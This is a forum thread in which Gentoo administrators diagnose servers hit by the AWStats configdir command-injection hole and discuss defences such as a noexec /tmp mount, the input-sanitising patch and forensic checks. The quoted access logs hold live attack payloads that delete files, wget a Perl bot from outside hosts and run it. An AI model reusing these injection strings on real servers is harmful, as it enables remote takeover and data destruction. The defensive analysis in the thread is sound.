hacked by shellbot [via awstats 6.3-r2][solved]

[kaidon]

Code: Select all

211.105.221.84 - - [31/Mar/2005:10:40:21 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www \
.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e \
27d73cae29fe2b80f9293f60;echo%20;echo| HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98 )"

putting the above request into a url decoder gave me:

Code: Select all

Decoded Results: 211.105.221.84 - - [31/Mar/2005:10:40:21 0900] "GET 
/awstats/awstats.pl?configdir=|echo ;
cd /tmp;
rm -rf *;
killall -9 perl;
wget www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60;
perl sess_3539283e27d73cae29fe2b80f9293f60;echo ;
echo| HTTP/1.1" 200 604 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

What I also find a good idea on a server is to mount your /tmp directory like:

Code: Select all

tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0
# or:
#/dev/hdaX    /tmp    tmpfs    nodev,nosuid,noexec    0 0
# if you're short on ram

which would have prevented the perl script from being executed.

cheers
k

mod edit: inserted \ linebreak for formatting --Earthwings

[newtonian]

What I also find a good idea on a server is to mount your /tmp directory like:

Code: Select all

tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0
# or:
#/dev/hdaX    /tmp    tmpfs    nodev,nosuid,noexec    0 0
# if you're short on ram

which would have prevented the perl script from being executed.

cheers
k

Thanks for the advise, I'll add the line above to my /etc/fstab when access slows down and do a reboot.

I'm assuming that adding the above line won't have any affect on qmail,vpopmail, qmail-scanner or apache.
If not I'm sure I'll find out soon enough.


Cheers,

[newtonian]

Here's my current fstab:

Code: Select all

# <fs>                  <mountpoint>    <type>          <opts> <dump/pass>

/dev/sda1               /boot           ext2            noauto,noatime 1 1
/dev/sda3               /               ext3            noatime 0 0
/dev/sda2               none            swap            sw 0 0
/dev/cdroms/cdrom0      /mnt/cdrom      iso9660         noauto,ro 0 0

I've got partitions for boot, root and swap but nothing for tmp.
Do I need to re-partition my hard disk? or can I just add something to fstab to get it to work.

tmpfs /tmp tmpfs nodev,nosuid,noexec 0 0

Cheers,

[kaidon]

If you've got plenty of ram you can mount your /tmp on a tmpfs filesystem.
In this case you don't need to alter any partition tables.
Depending on what apps you're running it'll also be quite a speed up.

You may want to set the maximum size used for the tmpfs. It will only uses the space it requires anyway (grows and shrinks as needed), but setting a max value prevents it from using up to much ram.

Personally I like to have multiple partitions on a server.
Here's one of my /etc/fstab's as an example:

Code: Select all

/dev/hda1     /boot          ext2             noauto,noatime                       1 2
/dev/hda2     none           swap            sw                                        0 0
/dev/hda3     /                 reiserfs        noatime,notail                        0 1
/dev/hda5     /var            reiserfs        noatime,notail,nodev,nosuid    0 0
/dev/hda6     /usr            reiserfs        noatime,notail,nodev,ro           0 0
/dev/hda7     /home         reiserfs        noatime,notail,nodev,nosuid    0 0
/dev/hda8     /mnt/build   reiserfs        noauto,noatime,notail,nodev,nosuid 0 0
/dev/hda9     /opt            reiserfs        noatime,notail,nodev,rw          0 0
/dev/hda10   /cvs            reiserfs        noatime,notail,nodev,nosuid    0 0
#
none            /proc           proc            defaults                                 0 0
none            /dev/shm     tmpfs          defaults                                 0 0
tmpfs           /tmp            tmpfs          nodev,nosuid,noexec              0 0
# run amavisd-new temp directory on tmpfs
tmpfs /var/amavis/tmp tmpfs   defaults,nodev,nosuid,noexec,mode=700,uid=102,gid=2003  0 0

A recomended reading giving the above tips plus meny more is
http://www.gentoo.org/doc/en/gentoo-security.xml

hth
cheers
Steven

[newtonian]

If you've got plenty of ram you can mount your /tmp on a tmpfs filesystem.
In this case you don't need to alter any partition tables.
Depending on what apps you're running it'll also be quite a speed up.

You may want to set the maximum size used for the tmpfs. It will only uses the space it requires anyway (grows and shrinks as needed), but setting a max value prevents it from using up to much ram.

hth
cheers
Steven

My server access slowed down so I added the single line you suggested and rebooted:

Code: Select all

tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0

now my fstab looks like this:

Code: Select all

# <fs>                  <mountpoint>    <type>          <opts>                  <dump/pass>
# NOTE: If your BOOT partition is ReiserFS, add the notail option to opts.
/dev/sda1               /boot           ext2            noauto,noatime          1 1
/dev/sda3               /               ext3            noatime                 0 0
/dev/sda2               none            swap            sw                      0 0
/dev/cdroms/cdrom0      /mnt/cdrom      iso9660         noauto,ro               0 0
tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0
none                    /proc           proc            defaults                0 0
none                    /dev/shm        tmpfs           defaults                0 0

I tested to see if I could run executables from the tmp directory.

Code: Select all

hawk tmp # cd /tmp
hawk tmp # cat david.hack
#/bin/sh
echo 'I am runnable'
hawk tmp # ls -l david.hack
-rwxrwxr-x  1 root root 30 Apr 14 02:34 david.hack
hawk tmp # whoami
root
hawk tmp # ./david.hack
-bash: ./david.hack: Permission denied

I couldn't

I made sure mail and apache were working ok and everything tested out fine.
I'm all set. Thanks for the useful advise!

[Koon]

awstats 6.3-r2 includes 6.4-based patches that fix the configdir problem :

Code: Select all

if ($QueryString =~ /configdir=([^&]+)/i)
   { $DirConfig=&Sanitize(&DecodeEncodedString("$1")); }

with:

Code: Select all

sub Sanitize {
        my $stringtoclean=shift;
        my $full=shift||0;
        if ($full) {
            $stringtoclean =~ s/[^\w]//g;
    } else {
            $stringtoclean =~ s/[^\w\-\\\/\.:\s]//g;
        }
        return $stringtoclean;
}

So the "|echo ;cd /tmp;wget www.hacker.com/badscript;echo ;echo|" would get stripped of the | and ; and therefore be harmless.

My guess is that the awstats.pl in your cgi-bin wasn't an updated version. Awstats is a webapp-config enabled package, so it requires you to deploy it after installation on your virtual hosts (using webapp-config). If you don't, you may have lying around an old vulnerable awstats.pl in cgi-bin...

-K

[linux_girl]

holly crap me too :

Code: Select all

zcat /var/log/apache2/access_log.1.gz |grep awstats.pl|grep configdir

 210.114.146.150 - - [13/Sep/2005:09:43:45 +0200] "GET
//cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 389 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"  
 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:45 +0200] "GET
//cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 389  
 210.114.146.150 - - [13/Sep/2005:09:43:47 +0200] "GET
//cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows 98)"  
 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:47 +0200] "GET
//cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381  
 210.114.146.150 - - [13/Sep/2005:09:43:48 +0200] "GET
//cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 377 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows 98)"  
 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:48 +0200] "GET
//cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 377  
 210.114.146.150 - - [13/Sep/2005:09:43:50 +0200] "GET
//awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows 98)"  
 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:50 +0200] "GET
//awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381  
 203.114.64.241 - - [13/Sep/2005:10:28:58 +0200] "GET
//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.
138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 502 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"  
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:28:58 +0200] "GET 
//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.
138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 502
 203.114.64.241 - - [13/Sep/2005:10:28:59 +0200] "GET 
/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.
53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 510
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:28:59 +0200] "GET
/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.
53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 510
 
 203.114.64.241 - - [13/Sep/2005:10:29:00 +0200] "GET 
/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.
53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 787
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:00 +0200] "GET 
/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.
53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 787
 203.114.64.241 - - [13/Sep/2005:10:29:01 +0200] "GET 
/cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.
220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 506
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:01 +0200] "GET
/cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.
220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 506  
 203.114.64.241 - - [13/Sep/2005:10:29:02 +0200] "GET 
/awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://
80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200 
787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:02 +0200] "GET 
/awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://
80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 200
787
 203.114.64.241 - - [13/Sep/2005:10:29:04 +0200] "GET 
/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.
220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 508
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:04 +0200] "GET 
/stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.
220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 302 508
 203.114.64.241 - - [13/Sep/2005:10:29:05 +0200] "GET 
/stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"
302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:05 +0200] "GET 
/stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"
302 516
 203.114.64.241 - - [13/Sep/2005:10:29:06 +0200] "GET 
/stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"
302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 MY-IP 203.114.64.241 - - [13/Sep/2005:10:29:06 +0200] "GET 
/stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"
302 516

1)The exploit is no more aviable. juste wodering what it have done on my srver
2)Juste wondering how he hell did they knew about my awstats setup . i mean you cant find my awstat url on any search engine !

mod edit: inserted line breaks in code block for page formatting --Earthwings

[newtonian]

holly crap me too :

1)The exploit is no more aviable. juste wodering what it have done on my srver
2)Juste wondering how he hell did they knew about my awstats setup . i mean you cant find my awstat url on any search engine !

1)Did you have an IRC server running on your system? If you did the attackers may have been able to do more harm.

You should check for a root kit and I'd recommend changing your tmp directory so that files in tmp are no longer executable from within /tmp. You can find directions for both in this post.

2) I don't know about the script that attacked your system, but it is very easy to have a script attack random ip addresses.
That or maybe it was a previous or current user of your system. Or maybe there was a short period when you awstats setup was exposed and some web bot added your address and awstats link into a search engine.


Cheers,

[abaelinor]

aa

[linux_girl]

holly crap me too :

1)The exploit is no more aviable. juste wodering what it have done on my srver
2)Juste wondering how he hell did they knew about my awstats setup . i mean you cant find my awstat url on any search engine !

1)Did you have an IRC server running on your system? If you did the attackers may have been able to do more harm.

You should check for a root kit and I'd recommend changing your tmp directory so that files in tmp are no longer executable from within /tmp. You can find directions for both in this post.

2) I don't know about the script that attacked your system, but it is very easy to have a script attack random ip addresses.
That or maybe it was a previous or current user of your system. Or maybe there was a short period when you awstats setup was exposed and some web bot added your address and awstats link into a search engine.
Cheers,

ANALYSIS of the breakin

WIRED files owed by apache
the folowing files was all created by apache and doesnt match any
GETactivite in /var/log/apache/access
i remeber of cleaning /tmp/ times to times => removing hacker files DAM IT

Code: Select all

find / -group 81 -exec ls -gl '{}' \;
-rw-------  1 apache apache 2,1K sep 24 21:43 /tmp/sess_0569b807f3b1ee0f443ac4f703090435
-rw-------  1 apache apache   28 sep 20 21:53 /tmp/sess_0cf9d59765d44c71595229508aa4ad4c
-rw-------  1 apache apache    0 sep 21 21:21 /tmp/sess_2772093e5a5336a86386a86374cc0d24
-rw-------  1 apache apache  16K sep 27 10:32 /tmp/sess_3d0b8822f43dd7b5ec3a2092f1d1d402
-rw-------  1 apache apache    7 sep 11 11:41 /tmp/sess_62717f9c3a213dba20a89d94c84af0cf
-rw-------  1 apache apache 2,0K sep 14 04:24 /tmp/sess_8906480466f77adf635dea22987e2169
-rw-------  1 apache apache   78 sep 26 14:46 /tmp/sess_9995800ef00b8bb382ccfd3f0a72ff1c
-rw-------  1 apache apache 2,0K sep 19 19:04 /tmp/sess_bc5702670760d3014810079849809a56
-rw-------  1 apache apache    7 sep 25 19:26 /tmp/sess_bd4ec9e8c0d1c943e4ffbcbf5b2c63ce
-rw-------  1 apache apache    7 oct  1 18:13 /tmp/sess_c3f7c383478793804b15d272cd21834f
-rw-------  1 apache apache 2,0K sep 18 02:23 /tmp/sess_d486648c6a3f8dc0b9fa7612002c42ea
-rw-------  1 apache apache   78 sep 26 14:46 /tmp/sess_d6e3c88f8754240d4010bc8e7672a60d
-rw-------  1 apache apache    7 oct  1 17:05 /tmp/sess_d7d34a92d14fbf09af900f97fe6e761c
-rw-------  1 apache apache    7 sep 27 23:08 /tmp/sess_e0e884fe36e1ddc25852ccb354f6b9ea
-rw-------  1 apache apache 2,0K sep 15 19:15 /tmp/sess_e4c5c058f61fcfb41cf48735a73a7f6d
-rw-------  1 apache apache    7 sep 29 13:27 /tmp/sess_f742e0a34a022894388793c5bdbda19c
-rw-------  1 apache apache    7 oct  1 17:30 /tmp/sess_fd3587d62383ae5badfcad12c70ca359

SOME INBOX

Code: Select all

cat /tmp/sess_3d0b8822f43dd7b5ec3a2092f1d1d402
sq_base_url|s:27:"http://webmail.MY_APACHE_SERVER.COM";base_uri|s:1:"/";onetimepad|s:12:
"AhobV7wnT9o=";sqimap_capabilities|a:12:{s:9:"IMAP4rev1";b:1;s:7:"UIDPLUS";b:1;s:8:"CHILDREN";b:1;s:9:"NAMESPACE";b:1;s:6: \
"THREAD";s:10:
"REFERENCES";s:4:
"SORT";b:1;s:5:"QUOTA";b:1;s:4:"IDLE";b:1;s:4:"AUTH";s:5:"PLAIN";s:3:"ACL";b:1;s:4:"ACL2"; \
s:5:"UNION";s:14:
"XCOURIEROUTBOX";
s:14:"INBOX.Outbox
";}delimiter|s:1:".";username|s:5:"pbx06";user_is_logged_in|b:1;just_logged_in|b:0;
attachment_common_types|a:6:{s:9:"text/html";b:1;s:10:"image/jpeg";b:1;s:9:"image/png";b:1;s:6:"text/*";b:1;s:7: \
"image/*";b:1;s:3:"*/*";b:1;}
attachment_common_types_parsed|a:0:{}prefs_cache|a:7:{s:17:"show_html_default";s:1:"0";s:4:"sort"; \
s:1:"0";s:13:"javascript_on";s:1:"1";s:8:"hililist";s:6:
"a:0:{}";s:12:"chosen_theme";s:24:"../themes/dark_green.php";s:10:"custom_css";s:14:"verdana-10.css"
;s:8:"show_num";s:2:"30";}
prefs_are_cached|b:1;theme_css|s:0:"";boxesnew|a:30:{i:0;a:7:
{s:3:"raw";s:45:"* LIST (\Unmarked \HasChildren) "." "INBOX"
";s:9:"formatted";s:5:"INBOX";s:14:"unformatted-dm";s:5:"INBOX";s:11:"unformatted";s:5:
"INBOX";s:16:"unformatted-disp";s:5:
"INBOX";s:2:"id";i:0;s:5:"flags";a:2:{i:0;s:8:"unmarked";i:1;s:11:"haschildren";}}i:1;a:7:
{s:3:"raw";s:44:"* LIST (\HasNoChildren) "." "INBOX.Drafts"
";s:9:"formatted";s:18:"  Drafts";s:14:"unformatted-dm";s:12:"INBOX.Drafts";s:11:"unformatted";s:12:
"INBOX.Drafts";s:16:"unformatted-disp";s:12:"INBOX.Drafts";s:2:"id";i:5;s:5:
"flags";a:1:{i:0;s:13:"hasnochildren";}}i:2;a:7:
{s:3:"raw";s:42:"* LIST (\HasNoChildren) "." "INBOX.Sent"
";s:9:"formatted";s:16:"  Sent";s:14:"unformatted-dm";s:10:"INBOX.Sent";s:11:"unformatted";s:10:
"INBOX.Sent";s:16:"unformatted-disp";s:10:"INBOX.Sent";s:2:"id";i:19;s:5:"flags";a:1:
{i:0;s:13:"hasnochildren";}}i:3;a:7:{s:3:"raw";s:43:"* LIST (\HasNoChildren) "." "INBOX.Trash"
";s:9:"formatted";s:17:"  Trash";s:14:"unformatted-dm";s:11:"INBOX.Trash";s:11:"unformatted";s:11:
"INBOX.Trash";s:16:"unformatted-disp";s:11:"INBOX.Trash";s:2:"id";i:26;s:5:"flags";a:1:
{i:0;s:13:"hasnochildren";}}i:4;a:7:{s:3:"raw";s:51:"* LIST (\HasNoChildren) "." "INBOX.nature
.
.
.
SOME sensitive info like senders mail adress to be used as spam mailing
.
.
.

[/size]

the above look like squirelmail webmail frontEND but it cant be !

Code: Select all

cat /tmp/sess_0569b807f3b1ee0f443ac4f703090435
DATA|a:4:{i:2;a:44:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;i:4;i:0;i:5;i:0;i:6;i:0;i:7;i:0;i:8;i:0;i:9;i:0;i:10;i:0;i:11
;i:0;i:12;i:12;i:13;i:16;
i:14;i:11;i:15;i:15;i:16;i:26;i:
17;i:22;i:18;i:33;i:19;i:34;i:20;i:36;i:21;i:30;i:22;i:20;i:23;i:16;i:24;i:15;i:25;i:27;i:26;i:23;i:27;i:17;i:
28;i:18;i:29;i:19;i:30;i:22;i:31;i:
16;i:32;i:23;i:33;i:19;i:34;i:18;i:35;i:18;i:36;i:26;i:37;i:31;i:38;i:17;i:39;i:15;i:40;i:24;i:41;i:17;i:42;i:
15;i:43;i:33;}i:1;a:44:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;i:4;i:0;i:5;i:0;i:6;i:0;i:7;i:0;i:8;i:0;i:9;i:0;i:10;i:0;i:
11;i:0;i:12;i:12;i:13;i:16;
i:14;i:11;i:15;i:15;i:16;i:26;
i:17;i:22;i:18;i:33;i:19;i:34;i:20;i:36;i:21;i:30;i:22;i:20;i:23;i:16;i:24;i:15;i:25;i:27;i:26;i:23;i:27;i:17;
i:28;i:18;i:29;i:19;i:30;i:22;i:31;i:
16;i:32;i:23;i:33;i:19;i:34;i:18;i:35;i:18;i:36;i:26;i:37;i:31;i:38;i:17;i:39;i:15;i:40;i:24;i:41;i:17;i:42;i:
15;i:43;i:33;}i:0;a:44:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;i:4;i:0;i:5;i:0;i:6;i:0;i:7;i:0;i:8;i:0;i:9;i:0;i:10;i:0;i
:11;i:0;i:12;i:28;i:13;i
:22;i:14;i:42;i:15;i:37;i:16;i:235;
i:17;i:30;i:18;i:68;i:19;i:72;i:20;i:68;i:21;i:74;i:22;i:43;i:23;i:46;i:24;i:24;i:25;i:37;i:26;i:37;i:27;i:28;
i:28;i:31;i:29;i:27;i:30;i:37;i:31;
i:44;i:32;i:38;i:33;i:29;i:34;i:83;i:35;i:24;i:36;i:56;i:37;i:71;i:38;i:27;i:39;i:31;i:40;i:45;i:41;i:31;i:42
;i:34;i:43;i:81;}s:1:"x";a:44:{i:0;s:5:"11.08";i:1;s:5:"12.08";i:2;s:5:"13.08";i:3;s:5:"14.08";i:4;s:5:"15.08";i:5;s:5:"16.08";i:6;s:5:
"17.08";i:7;s:5:"18.08";i:8;s:5:
"19.08";i:9;s:5:"20.08";i:10;s:5:"21.08";i:11;s:5:"22.08";i:12;s:5:"23.08";i:13;s:5:"24.08";i:14;s:5:"25
.08";i:15;s:5:"26.08";i:16;s:5:
"27.08";i:17;s:5:"28.08";i:18;s:5:"29.08";i:19;s:5:"30.08";i:20;s:5:"31.08";i:21;s:5:"01.09";i:22;s:5:"02.09";i:
23;s:5:"03.09";i:24;s:5:
"04.09";i:25;s:5:"05.09";i:26;s:5:"06.09";i:27;s:5:"07.09";i:28;s:5:"08.09";i:29;s:5:"09.09";i:30;s:5:"10.09";i
:31;s:5:"11.09";i:32;s:5:
"12.09";i:33;s:5:"13.09";i:34;s:5:"14.09";i:35;s:5:"15.09";i:36;s:5:"16.09";i:37;s:5:"17.09";i:38;s:5:"18.09";i:
39;s:5:"19.09";i:40;s:5:
"20.09";i:41;s:5:"21.09";i:42;s:5:"22.09";i:43;s:5:"23.09";}}

[/size]

MD5SUM
i have over 1000 files that didnt match portage !md5!

Code: Select all

qpkg -v -v -c|grep "!md5!"|wc) including gcc/glibc,netstat,ping & a couple of /usr/linux/ c code.

checkrootkit found 0 rootkit
but it terible old/outdated & LAME & static


SETUID/GUID files
found somme suspisous KDE SETUID file:

Code: Select all

-rws--x--x  1 root 30420 aoû 23 05:47 /bin/su
-rwsr-x--x  1 root 31056 oct 28  2004 /bin/ping
-rws--x--x  1 root 71684 fév  3  2005 /bin/mount
-rws--x--x  1 root 24752 oct 28  2004 /bin/ping6
-rws--x--x  1 root 32296 aoû 23 05:47 /bin/passwd
-rws--x--x  1 root 39848 fév  3  2005 /bin/umount
-rwxr-sr-x  1 zendtech 237732 oct  1 16:59 /opt/Zend/sbin/ini_modifier
-r-s--x--x  1 root 12608 aoû 27 23:36 /opt/vmware/bin/vmware-ping
-r-sr-xr-x  1 root 4714 aoû 27 23:36 /opt/vmware/bin/vmware
-rws--x--x  1 root 3636940 aoû 27 23:36 /opt/vmware/lib/bin/vmware-vmx
-rws--x--x  1 root 756668 jun 16 18:20 /usr/bin/gpg
-rws--x--x  1 root 49988 jui  5 03:43 /usr/bin/ksu
-r-xr-s--x  1 man 50796 sep 28 14:19 /usr/bin/man
-rws--x--x  1 root 2171160 oct  3 21:52 /usr/bin/Xorg
-rws--x--x  1 root 35524 aoû 23 05:47 /usr/bin/chfn
-rws--x--x  1 root 31520 aoû 23 05:47 /usr/bin/chsh
---s--x--x  1 root 93084 fév 11  2005 /usr/bin/sudo
-rws--x--x  1 lp 11904 mar 20  2005 /usr/bin/lppasswd
-rws--x---  1 cron 33644 mai 16 07:00 /usr/bin/crontab
-rws--x--x  1 root 41104 aoû 23 05:47 /usr/bin/chage
-rwsr-xr-x  1 root 17132 jan 30  2005 /usr/bin/eject #(setuid by me to eject USB media device easier)
-rwxr-s--x  1 tty 10652 fév  3  2005 /usr/bin/write
-rwxr-s--x  1 mail 9564 jun 11 16:36 /usr/bin/dotlock
-rwx--s--x  1 slocate 32904 fév 19  2005 /usr/bin/slocate
-rws--x--x  1 root 220424 fév 14  2005 /usr/bin/xscreensaver
---s--x--x  1 root 18876 fév 13  2005 /usr/bin/mount.cifs
-rws--x--x  1 root 24540 aoû 23 05:47 /usr/bin/expiry
-rws--x--x  1 root 26140 aoû 23 05:47 /usr/bin/newgrp
-rws--x--x  1 root 43648 aoû 23 05:47 /usr/bin/gpasswd
-rwxr-s--x  1 utmp 301020 fév 11  2005 /usr/bin/screen
---s--x--x  1 root 11280 fév 13  2005 /usr/bin/smbmnt
---s--x--x  1 root 9012 fév 13  2005 /usr/bin/smbumount
-rwxr-s--x  1 root 16000 jun 12 17:30 /usr/bin/lockfile
-rwxr-s--x  1 mail 38796 jun 14 18:23 /usr/bin/mutt_dotlock
-rws--s--x  1 root 78240 jun 12 17:30 /usr/bin/procmail
-rws--x--x  1 root 692688 mar 19  2005 /usr/kde/3.3/bin/kppp
-rws--s--x  1 root 61028 mar 19  2005 /usr/kde/3.3/bin/reslisa
-rws--x--x  1 root 702788 aoû 25 00:01 /usr/kde/3.4/bin/kppp
-rws--x--x  1 root 61148 aoû 25 00:01 /usr/kde/3.4/bin/reslisa
-rws--x--x  1 root 10997 jun 22 00:28 /usr/kde/3.4/bin/fileshareset
-rws--x--x  1 root 7692 jun 22 00:28 /usr/kde/3.4/bin/kgrantpty
-rws--x--x  1 root 6920 sep 10 10:43 /usr/kde/3.4/bin/artswrapper
-rwxr-s--x  1 nogroup 76468 jun 22 02:29 /usr/kde/3.4/bin/kdesud
-rws--x--x  1 root 14192 jun 22 02:29 /usr/kde/3.4/bin/kcheckpass
-rws--x--x  1 root 8036 jun 22 00:28 /usr/kde/3.4/bin/kpac_dhcp_helper
-rws--x--x  1 root 11788 aoû 23 07:25 /usr/lib/misc/glibc/pt_chown
-rws--x--x  1 root 152896 avr  4  2005 /usr/lib/misc/ssh-keysign
-rws--x---  1 squid 17452 mai 16 09:38 /usr/lib/squid/pam_auth
-rws--x---  1 squid 17796 mai 16 09:38 /usr/lib/squid/ncsa_auth
-r-s--x--x  1 root 18264 aoû 23 05:41 /usr/sbin/unix_chkpwd
-rwsr-xr-x  1 root 28512 fév 11  2005 /usr/sbin/fping
-rws--x---  1 wheel 20620 jun 25 20:33 /usr/sbin/traceroute
-rwxr-sr-x  1 postdrop 106348 jun 12 17:57 /usr/sbin/postdrop
-rws--x---  1 apache 13448 sep 25 08:43 /usr/sbin/suexec2
-rwxr-sr-x  1 postdrop 128244 jun 12 17:57 /usr/sbin/postqueue
-rws--x--x  1 root 11932 fév  1  2005 /usr/sbin/gnome-pty-helper
-rwxr-s--x  1 utmp 8312 mar 13  2005 /usr/sbin/utempter
-rwxr-s--x  1 mail 9476 jun 15 20:23 /usr/libexec/camel-lock-helper-1.2
-rws--x--x  1 mail 24104 jun 11 16:36 /usr/libexec/mail.local
-rwxr-s--x  1 utmp 9804 jan 31  2005 /usr/libexec/gnome-pty-helper
-rwsr-sr-t  1 users 0 jan  8  2005 /home/pbx06/.superkaramba/.lock

LISTENING ports
everythings seems OK excepting for
dnsmaq witch is a light DNS server : witch is also listening on eth0/*:33493

glsa-check'ing the BOX
only the awstats seems to exploitable

Code: Select all

glsa-check -l | grep '\[N\]'
WARNING: This tool is completely new and not very tested, so it should not be
used on production systems. It's mainly a test tool for the new GLSA release
and distribution system, it's functionality will later be merged into emerge
and equery.
Please read http://www.gentoo.org/proj/en/portage/glsa-integration.xml
before using this tool AND before reporting a bug.

[N] indicates that the system might be affected.
200509-01 [N] MPlayer: Heap overflow in ad_pcm.c ( media-video/mplayer )
200509-06 [N] Squid: Denial of Service vulnerabilities ( net-proxy/squid )
200509-08 [N] Python: Heap overflow in the included PCRE library ( dev-lang/python )
200509-10 [N] Mailutils: Format string vulnerability in imap4d ( net-mail/mailutils )
200509-13 [N] Clam AntiVirus: Multiple vulnerabilities ( app-antivirus/clamav )
200509-15 [N] util-linux: umount command validation error ( sys-apps/util-linux )
200509-18 [N] Qt: Buffer overflow in the included zlib library ( x11-libs/qt )
200510-04 [N] Texinfo: Insecure temporary file creation ( sys-apps/texinfo )
200506-22 [N] sudo: Arbitrary command execution ( app-admin/sudo )
200506-23 [N] Clam AntiVirus: Denial of Service vulnerability ( app-antivirus/clamav )
200508-01 [N] Compress::Zlib: Buffer overflow ( dev-perl/Compress-Zlib )
200508-04 [N] Netpbm: Arbitrary code execution in pstopnm ( media-libs/netpbm )
200508-07 [N] AWStats: Arbitrary code execution using malicious Referrer information ( net-www/awstats )
200508-08 [N] Xpdf, Kpdf, GPdf: Denial of Service vulnerability ( kde-base/kdegraphics app-text/xpdf app-text/gpdf ... )
200508-17 [N] libpcre: Heap integer overflow ( dev-libs/libpcre )
200508-19 [N] lm_sensors: Insecure temporary file creation ( sys-apps/lm_sensors )
200507-04 [N] RealPlayer: Heap overflow vulnerability ( media-video/realplayer )
